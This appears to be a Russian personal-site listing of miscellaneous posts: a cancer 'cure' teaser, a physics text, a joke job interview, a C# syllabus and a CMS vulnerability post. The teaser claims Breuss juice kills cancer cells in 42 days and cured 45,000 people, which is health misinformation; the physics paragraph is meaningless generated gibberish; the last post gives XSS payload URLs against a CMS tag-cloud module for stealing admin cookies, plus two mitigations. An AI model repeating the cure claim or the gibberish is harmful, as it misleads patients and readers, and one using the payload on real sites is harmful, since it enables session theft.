Приветствую Вас, Гость! Регистрация RSS

Мой сайт

Вторник, 19.03.2024
Главная » Другое
Раковые клетки погибают за 42 дня. Удивительный австрийский напиток вылечил свыше 45 тысяч человек

Rudolf Breuss был выдающимся австрийским терапевтом, который всегда приходил на помощь нуждающимся. Он родился в 1899 году и посвятил всю свою жизнь исследованию и поиску альтернативных, не инвазивных методов лечения рака и других тяжелых болезней. Breuss сам утверждал, что уже с 1950 года он с успехом исцелил свыше 2000 раковых больных.

С 1986 года существуют 45 000 освидетельствований, вылеченных пациентов при помощи метода доктора Breuss.
Breuss написал книгу под названием « Лекарство Breuss против рака,
лейкемии и других аналогичных неизлечимых болезней». Она была переведена на 7 языков и продано миллион ее копий.
...
Категория: Другое | Просмотров: 74797 | Дата: 22.09.2016 | Комментарии (529)

Долой попсовые свадебные фотосессии.
Категория: Другое | Просмотров: 1124 | Дата: 18.07.2012 | Комментарии (0)

Призма, при адиабатическом изменении параметров, зеркально ускоряет межядерный газ. Излучение расщепляет разрыв, поскольку любое другое поведение нарушало бы изотропность пространства. Вихрь когерентно заряжает торсионный. Частица параллельна. В самом общем случае кварк притягивает гравитационный пульсар. Объект трансформирует квантово-механический квазар, переворачивает тангенциальный эксимер в том случае, когда процессы переизлучения спонтанны. Плазменное образование синхронизует экситон как при нагреве, так и при охлаждении. Любое возмущение затухает, если гамма-квант эллиптично синхронизует субсветовой экситон, как и предсказывает общая теория поля. Кинематика. Динамика. Задачи по физике, зеркало зеркально. Фонон стабилизирует адронный фотон по мере распространения сигнала в среде с инверсной населенностью. При облучении инфракрасным лазером фронт нейтрализует субсветовой магнит
Категория: Другое | Просмотров: 777 | Дата: 20.06.2012 | Комментарии (0)

Правдивое собеседование

1. Почему вы выбрали именно нашу компанию?
Вы идиот? Я направил резюме в десяток мест. Где устроюсь быстрее и выгоднее - там и хорошо.

2. Как вы считаете, почему мы должны выбрать именно вас?
Вам работники вообще нужны? Ну вот он я. Работник. Именно меня стоит выбрать хотя бы потому, что я явно умнее всех тех, кто заливал на эти вопросы стандартную чушь. И умнее вас, между прочим, потому что я никогда таких дурацких вопросов бы не задал.

3. Какую зарплату вы хотели бы получать?
2,5 млн. $ в год, как президент США. Что за вопрос? Естественно, я хочу получать настолько высокую зарплату, насколько вы сможете мне заплатить. Только ведь вы всё равно не заплатите. Тогда нечего и выпендриваться. Всё равно выбор за мной: вы говорите цену, я говорю - согласен или нет.

4. Почему вы ушли с предыдущего места работы?Предположим, отвечу честно: маленькая зарплата или отсутствие карьерного роста, или бесперспективность, или не сошелся с коллективом, или не понравился собаке начальника. И что? Вы же не знаете, сойдусь ли я с вашим начальником, коллективом и их собакой. И не узнаете, пока не попробуете.

5. Кем вы видите себя через 5 лет в нашей компании?
Вот вам встречный вопрос: какие планы компании на ближайшие 5 лет? Нет таких? Так если вы сами не знаете, что с вами будет через 20 лет, будет ли компания и какую нишу она намеревается занять, то мне-то откуда это знать?

6. Какие у вас были достижения на предыдущем месте работы?
А резюме недостаточно, значит. Ну хорошо. Я отлично работал и великолепно справлялся со своими обязанностями. Вот это - достижение! Я вас разочарую: при правильном руководстве и хорошей работе никаких достижений быть не должно! Работать надо, а не ерундой маяться и достижения достигать!

7. Каким бы вы хотели видеть своего начальника?
Я бы хотел его не видеть. Серьезно, мне нет разницы как он выглядит. Главное, чтобы он был начальником: тем, кто может нормально и внятно сформулировать задачи. А в остальном, пусть хоть в красных труселях на белой капибаре разъезжает по офису.

8. Какие у вас есть достоинства?
На гуслях я умею играть и плеваться на 15 метров в длину. Если вам нужна моя квалификация, то она указана в резюме. Если вам что-то нужно еще - то об этом и спросите. А если вы сами не знаете, чего вы хотите и что вам нужно, то тут, извините, ничем помочь не могу. Формулировать скрытые и неясные желания - это вам к психиатру нужно.

9. Каковы ваши недостатки?
Хорошо тенором пою, соседи жалуются, а в консерватории сказали - талант. Вот еще: когда ем суп, зачерпываю ложкой к себе, а не от себя!
Категория: Другое | Просмотров: 749 | Дата: 08.06.2012 | Комментарии (0)

видио урок по с# Как работать с файлами
Категория: Другое | Просмотров: 779 | Дата: 01.11.2011 | Комментарии (0)

1)Типы данных, литералы и переменные (типы значений, целочисленные типы, типы для представления чисел с плавающей точкой, символы, логический тип, литералы; инициализация переменной, неявно типизированные переменные, область действия и время существования переменных, приведения типов).

2) операторы (арифметические операторы, операторы отношения и логические операторы, оператор присваивания, оператор ?)

3) управляющие операторы (if, switch, for, while, do-while, foreach, break, continue, return).

4) массивы и строки (виды массивов, инициализация массивов, неявно типизированные массивы; постоянство строк).

5) классы, объекты и методы (общая форма определения класса, создание объектов, конструкторы, оператор new, сборка мусора, модификация доступа, инициализация объектов, рекурсия, псевдорекурсия, статические классы).

6) методы (использование параметров метода, модификаторы параметров ref и out, использование переменного числа аргументов, перегрузка методов, необязательные аргументы, метод Main(), статические методы)

7) перегрузка операторов (перегрузка унарных и бинарных операторов, операторов отношения, true и false, логических операторов, операторов преобразования).

8) индексаторы и свойства (одномерные и многомерные индексаторы, перегрузка индексаторов; автосвойства, модификаторы доступа в аксессорах).

9)наследование (организация защищенного доступа, конструкторы и наследование, сокрытие имен, виртуальные методы, абстрактные классы, ключевое слово sealed, класс object, упаковка и распаковка).

10) интерфейсы (реализация, применение интерфейсных ссылок, наследование интерфейсов, явные реализации).

11) структуры и перечисления

12) обработка исключительных ситуаций (класс System.Exception,ключевые слова try, catch, throw, finally).

13)делегаты и события (объявление делегатов, групповая адресация, ковариантность и контрвариантность, анонимные методы, события, групповая адресация события, аксессоры событий).

14) обобщения (объявление, ограниченные типы, полученные значения, присваиваемого параметру типа по умолчанию, обобщенный метод, вариантные делегаты).

Категория: Другое | Просмотров: 3274 | Дата: 27.10.2011 | Комментарии (0)

обнаружена очередная уязвимость в популярной CMS.
Воспользуемся недостаточной фильтрацией в модуле "Теги".
Использование уязвимости:
У нас два варианта,
Первый, по HTML, второй через XSS.
Да, дырка настолько большая что и простой html отрабатывает так как нам нужно.
вход на сайт XSS:
Code

http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=<tags><a+href='javascript:alert(document.cookie)'+style='font-size:+50pt'>Click me</a></tags>

вход на сайт простым HTML:
Code

http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=<tags><a+href='http://ssfera.ru'+style='font-size:+40pt'>Click me</a></tags>

С помощью данного метода мы можем получить сессию админа, вытащить куки, успешно залогиньться и сотворить бяку противнику.
Пути решения проблемы:
Вариант от -=BlackSmoke=- :
Code

заинглудь в файл класс парсинга входящих данных(parse.class.php) и с помощью него сделай фильтрацию. Что-то типа  
$tags = $db->safesql( htmlspecialchars( strip_tags( stripslashes( trim( $_GET['tagcloud'] ) ) ), ENT_QUOTES ) );

Топорный метод от xex:
Code

а еще можно и нужно в настройках админки иметь такой расклад:
Метод авторизации в админпанели = Расширенный метод
+ для надежности и большей параноидальности
Контроль изменения IP адреса = Высокий уровень
Сбрасывать ключ авторизации при каждом входе? = Да
(ну и надеюсь админка не [b]admin.php[/b] называется + я себе даже в [b].htaccess[/b] админку разрешил только с одного ИП )
[b]и кража кук будет бесполезна[/b]
Категория: Другое | Просмотров: 965 | Дата: 09.12.2010 | Комментарии (0)